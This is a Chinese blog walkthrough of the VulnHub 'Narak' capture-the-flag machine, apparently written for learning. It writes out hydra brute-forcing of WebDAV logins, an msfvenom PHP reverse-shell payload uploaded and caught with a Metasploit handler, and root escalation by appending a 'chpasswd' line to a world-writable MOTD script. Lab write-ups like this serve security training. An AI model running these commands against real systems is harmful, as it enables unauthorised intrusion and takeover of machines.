【vulnhub】narak

本文详细记录了一次渗透测试的过程,从使用ARP扫描和Nmap进行主机发现,到利用WebDAV、 nikto、CEWL、Hydra等工具获取敏感信息和爆破登录,再到利用MSF反弹shell和提权技巧,包括WebDAV上传payload、MOTD提权。最终成功获取目标系统的两个flag。
摘要由CSDN通过智能技术生成

📒博客主页:开心星人的博客主页
🔥系列专栏:vulnhub
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年6月29日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

靶机知识点
1、webdav(重点)
2、nikto发现敏感信息
3、cwel爬取字典
4、hydra爆破
5、ssh服务
6、msf反弹shell
7、motd提权

主机发现
arp-scan -l
在这里插入图片描述
192.168.0.104 是靶机ip,因为VMware Inc

端口扫描
nmap -p- -sV 192.168.0.104
在这里插入图片描述

ssh服务和http服务

访问一下80端口
在这里插入图片描述
是个图片展示
在这里插入图片描述
翻到最后,Do Not Click
点一下
在这里插入图片描述
看这个url
在这里插入图片描述
到了这个目录遍历页面,不知道会不会有PUT文件上传之类的漏洞

dirb http://192.168.0.104
常规扫目录
在这里插入图片描述
在这里插入图片描述
没有权限

访问webdav
在这里插入图片描述
需要账号密码。
webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。

继续看别的吧

nikto -host 192.168.0.104 -port 80
收集一下信息
在这里插入图片描述
这一步其实没啥意义,但有时候可能会有用

cwel爬取网页的账号密码
cewl http://192.168.0.104/ -w dict.txt
在这里插入图片描述

hydra爆破
hydra -L dict.txt -P dict.txt 192.168.0.104 http-get /webdav
在这里插入图片描述
登录一下
在这里插入图片描述
还是用命令行来登录吧

cadaver http://192.168.0.104/webdav
在这里插入图片描述

webdav是基于http1.1的一种通信协议,类似于ftp的一种协议,可以上传下载文件。
再看一眼这个,所以可以传shell了
在这里插入图片描述
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=7777 -o shell.php
生成一个反弹shell的payload
在这里插入图片描述
可能需要去掉这个注释符,我去掉了
保存为了shell0.php

webdav上传shell
put shell0.php
在这里插入图片描述

msf开启监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.88.132
set lport 7777
run

浏览器访问一下我们上传的shell

在这里插入图片描述
msf这边拿到了shell
在这里插入图片描述
想用python弹一个交互式的shell,发现没有python,就这了
python3 -c 'import pty; pty.spawn("/bin/bash")'
要用python3
可以了

suid提权
查找具有suid权限的二进制文件
find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null
在这里插入图片描述
一个奇怪的hell.sh
直接看
在这里插入图片描述
brainfuck解码
得到chitragupt

在这里插入图片描述
用刚刚得到的密码,登录其他用户看看
先su看一下,不行在ssh

在这里插入图片描述

cd ~ 一定要去家目录看
在这里插入图片描述

拿到了第一个flag,第二个flag肯定是提权

不知道咋弄,看wp
motd提权
还是那个suid一部分可能
在这里插入图片描述
有一个00-header文件
在这里插入图片描述
motd(message of the day),每日提示,功能就是当我们登录时,来执行motd文件,达到提示目的。这里我们其他人也有修改权限,而且属主是root,可以用来提权。

当我们通过ssh登录成功的时候,这些sh脚本会以root权限运行输出那些欢迎信息和日期等等,并且我们当前这个用户对这些文件可读可写,那么提权思路就有了,我们可以通过在这些sh脚本中写入一个修改root用户密码的命令,这样当我们通过ssh用户登录到inferno这个账号上的时候,我们这些motd的sh脚本就会被以root用户的权限执行,这时候我们写入的修改root用户密码的命令也会被执行,之后我们只需要切换到root用户即可完成提权.

echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header

我们要用ssh登录inferno
ssh -p 22 inferno@192.168.0.104
输入密码chitragupt

su root
输入密码为inferno
登录成功

flag就在/root下

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值